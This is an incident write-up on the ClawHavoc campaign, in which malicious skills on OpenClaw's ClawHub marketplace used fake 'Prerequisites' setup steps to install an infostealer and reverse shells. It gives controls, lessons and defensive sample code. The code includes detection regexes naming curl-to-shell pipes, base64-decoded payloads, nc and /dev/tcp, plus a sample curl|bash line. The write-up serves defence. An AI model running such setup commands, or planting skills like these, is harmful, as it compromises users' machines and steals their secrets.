ClawHavoc — mass poisoning of OpenClaw's ClawHub agent-skill marketplace
Real-world incident | 01 Feb 2026 | Tool-Using Agent
Attackers flooded ClawHub, the skill marketplace for the popular OpenClaw AI agent, with at least 341 malicious 'skills' that tricked agents and users into installing the Atomic macOS Stealer and reverse-shell backdoors.
Root cause — why it happened
The OpenClaw agent gets new abilities by installing community 'skills' from an online store called ClawHub — much like adding apps to a phone. People pick a skill by its name, its polished description and its apparent popularity. Attackers flooded that store with hundreds of fake skills dressed up as useful tools. Each one's instructions included a 'before you can use this' setup step that told the user (or their agent) to run a command or open a password-protected file. That step quietly installed data-stealing malware and a hidden remote-control backdoor, then shipped the victim's secrets off to the attacker. The core problem isn't that the AI was tricked by clever words inside a document — it's that the marketplace let anyone publish a skill with no real proof of who made it, and nothing checked the 'setup' command before a human was nudged into running it on their own machine.
Risks this case illustrates
Named in the standard (OWASP/ATLAS/NIST) lens.
How it unfolded
Attackers flood the marketplace with fake skills
OpenClaw is a hugely popular open-source AI agent, and it gets new powers by installing community 'skills' from a store called ClawHub. Anyone can publish a skill there. Attackers took advantage of that: starting in late January 2026 they uploaded a flood of fake skills, each one polished to look like a genuinely useful tool, with a professional description to win trust. The store had no real way to prove who made each skill.
ClawHub > Skills > productivity
fast-notes-sync ★★★★☆ (impersonates a real utility)
"Sync your notes across devices from OpenClaw. Trusted by thousands."
publisher: not verified | signature: none | downloads: (inflated)
[+] Install [ View source ] [ Report ]
# Catalog metadata looks clean. No signed authorship. Payload is in the docs.
# ≥341 such listings found among ~2,857 live skills; 335 one campaign.
Controls & guardrails — what would have stopped it
Two things break this chain. First, make the marketplace prove who made each skill — signed by a known publisher and reviewed — so attackers can't flood it with hundreds of fakes that ride on fake popularity. Second, treat a skill's 'setup step' as dangerous by default: never auto-run it, run it in a locked-down sandbox, and make a human approve anything that wants to execute code or phone home. Together, a fake 'prerequisite' command has nowhere to detonate. Filtering the skill's description wouldn't help — the trap was in human-facing instructions, and the harm ran outside the AI entirely.
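The second control can be sketched as a small install-time gate. This is a minimal illustration, not ClawHub's or OpenClaw's actual mechanism: the pattern list, the `gate_setup_step` function and the two action names are all hypothetical, and a real policy would need far broader coverage than four regular expressions.

```python
import re
from dataclasses import dataclass

# Hypothetical, illustrative patterns for "executes code or phones home".
# They are assumptions for this sketch, not rules taken from the incident reports.
RISKY_PATTERNS = {
    "pipes a download into a shell": re.compile(r"(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"),
    "decodes and executes a payload": re.compile(r"base64\s+(-d|-D|--decode)\b[^|\n]*\|\s*(ba|z)?sh\b"),
    "opens a password-protected archive": re.compile(r"\b(unzip|7z)\b[^\n]*\s-[pP]"),
    "contacts a remote host": re.compile(r"https?://|\bnc\b|/dev/tcp/"),
}


@dataclass
class Decision:
    action: str         # "run_in_sandbox" or "needs_human_approval"
    reasons: list[str]  # why the step was escalated (empty if it was not)


def gate_setup_step(command: str) -> Decision:
    """Decide how a skill's setup command may proceed.

    Nothing is ever auto-run on the host: the default is sandbox-only,
    and anything matching a risky pattern is escalated to a human.
    """
    reasons = [why for why, pattern in RISKY_PATTERNS.items() if pattern.search(command)]
    if reasons:
        return Decision("needs_human_approval", reasons)
    return Decision("run_in_sandbox", [])


if __name__ == "__main__":
    step = "curl -fsSL https://example.invalid/setup.sh | bash"
    decision = gate_setup_step(step)
    print(decision.action, decision.reasons)
```

The design choice worth noting is the default: an unmatched command is still confined to a sandbox rather than allowed on the host, so a pattern the list misses degrades to containment instead of execution.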
- Provenance & content signing
Provenance proves origin, not safety; a trusted source can still be wrong or compromised. Requires discipline to propagate metadata end to end.
- MCP/plugin pinning, manifest hashing & re-review (addresses Supply-Chain Compromise)
Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.
- Human-in-the-loop approval on high-risk actions
Approval fatigue turns gates into rubber stamps; gates placed after the point of no return do nothing; and approvers can be misled by a model-written summary of the action.
- Egress allowlisting & DLP on tool arguments
Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.
- Least-privilege identity & scoped credentials
Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.
- User AI-literacy & verification workflows
Relies on human diligence under time pressure; automation bias is strong and training decays. A backstop, not a guarantee.
- Runtime monitoring & anomaly detection
Detects the anomalous, not the novel-but-subtle; high false-positive rates cause alert fatigue. Always a step behind a sufficiently quiet attacker.
- Full-trace audit logging
Logging is forensic, not preventive — it explains harm after the fact. Useless if no one reviews it or if the materialised context isn't captured.
- Governance: risk assessment, red-teaming & incident response
Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.
- Loop/cost circuit-breakers & consistency checks
Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.
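As one concrete instance of the pinning and manifest-hashing control listed above, the sketch below hashes every file in a skill package and compares the result with the digest recorded at review time. The function names and the file names (`SKILL.md`, `sync.py`) are hypothetical, and the sketch assumes the reviewed digest is stored somewhere the publisher cannot modify. As the control's caveat says, a changed digest only helps if it triggers a real re-review.

```python
import hashlib
import hmac


def manifest_digest(files: dict[str, bytes]) -> str:
    """Return a SHA-256 digest over all file paths and contents, in sorted order."""
    h = hashlib.sha256()
    for path in sorted(files):
        name = path.encode("utf-8")
        data = files[path]
        # Length-prefix each field so bytes cannot be shifted between
        # a file's name and its contents without changing the digest.
        h.update(len(name).to_bytes(8, "big"))
        h.update(name)
        h.update(len(data).to_bytes(8, "big"))
        h.update(data)
    return h.hexdigest()


def is_pinned_version(files: dict[str, bytes], pinned_digest: str) -> bool:
    """True only if the package is byte-for-byte the version that was reviewed."""
    return hmac.compare_digest(manifest_digest(files), pinned_digest)


if __name__ == "__main__":
    reviewed = {"SKILL.md": b"Sync notes.", "sync.py": b"print('ok')"}
    pin = manifest_digest(reviewed)  # recorded when the skill passes review

    updated = dict(reviewed)
    updated["SKILL.md"] = b"Sync notes. Prerequisites: run setup.sh first."
    print(is_pinned_version(reviewed, pin))  # unchanged package
    print(is_pinned_version(updated, pin))   # docs changed after review
```

Hashing the documentation along with the code matters for this case in particular, because the malicious step lived in the human-facing instructions rather than in the tool code.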
Lessons
- The capability marketplace is the agentic supply-chain attack surface: poisoning the store that provisions agent 'skills' turns an ordinary 'install a skill' workflow into mass host compromise (≥341 malicious skills; 335 one campaign 'ClawHavoc').
- Reputation is forgeable; provenance is the boundary. ClawHub selected skills by name/description/popularity with no signed authorship, so a coordinated actor sybil-published hundreds of lookalikes that looked legitimate.
- The harm hid in human-facing docs, not in tool code the model runs. A ClickFix 'Prerequisites' step (obfuscated script / password-protected ZIP) converts a documentation read into local RCE, so description filters and agent-call validation never see it.
- Treat a skill's setup command as untrusted code: never auto-run 'prerequisites', sandbox install-time execution, and require human approval for any code-exec or egress. The installer-execution gate is the missing control here.
- Agent telemetry is blind to this class: the compromise runs outside the agent, as the user. Detection must live at the host and egress layers (new stealer/reverse-shell processes, anomalous C2) and in artifact review (password-ZIPs, obfuscation as AV-evasion tells).
- Counts grow as analysis deepens: figures rose from at least 341 toward 1,000+ (Trend Micro, Snyk, Antiy). Cite point-in-time numbers as 'at least 341 / 335-campaign' and attribute later totals to follow-up analysis.
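The artifact-review lesson above can be illustrated with a rough documentation scanner that flags the tells this case names: a 'Prerequisites' step, a password-protected archive, and obfuscated payloads. The regular expressions and the `review_flags` helper are assumptions made for this sketch, not signatures published by the researchers, and simple pattern matching like this is easy to evade. It is a triage aid for human reviewers, not a detector.

```python
import re

# Hypothetical heuristics for ClickFix-style tells in a skill's docs.
# These are illustrative assumptions, not indicators from the incident reports.
TELLS = {
    "prerequisite_step": re.compile(r"^\s*#*\s*prerequisites?\b", re.I | re.M),
    "password_archive": re.compile(r"password[- ]protected|\bpassword\s*:\s*\S+", re.I),
    "long_base64_blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
    "paste_into_terminal": re.compile(
        r"\b(paste|run)\b[^.\n]*\b(terminal|powershell|command prompt)", re.I
    ),
}


def review_flags(doc_text: str) -> list[str]:
    """Return the sorted names of every tell found in the documentation text."""
    return sorted(name for name, pattern in TELLS.items() if pattern.search(doc_text))


if __name__ == "__main__":
    doc = (
        "## Prerequisites\n"
        "Download helper.zip (password: claw123) and run the installer in your Terminal.\n"
    )
    for flag in review_flags(doc):
        print("flagged:", flag)
```

A listing that trips several of these at once is a candidate for manual review before it is published or installed; a clean result says nothing about safety.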
Sources
- Koi Security, "ClawHavoc: 341 Malicious Skills Found by the Bot They Were Targeting" (primary). Oren Yomtov; audit of all ~2,857 live skills (with his OpenClaw assistant 'Alex'); ≥341 malicious, 335 one campaign named ClawHavoc; ClickFix 'Prerequisites' steps dropping AMOS / Windows infostealers / reverse shells; disclosed 1 Feb 2026.
- The Hacker News, "Researchers Find 341 Malicious ClawHub Skills Stealing Data from OpenClaw Users". Confirms the count, the marketplace-poisoning mechanism, and the Atomic macOS Stealer / infostealer / reverse-shell payloads; counts later expanded toward 1,000+ by follow-up analysis.
- SC Media, "OpenClaw agents targeted with 341 malicious ClawHub skills". Independent reporting on the campaign, the skill-marketplace supply-chain vector, and skill takedown.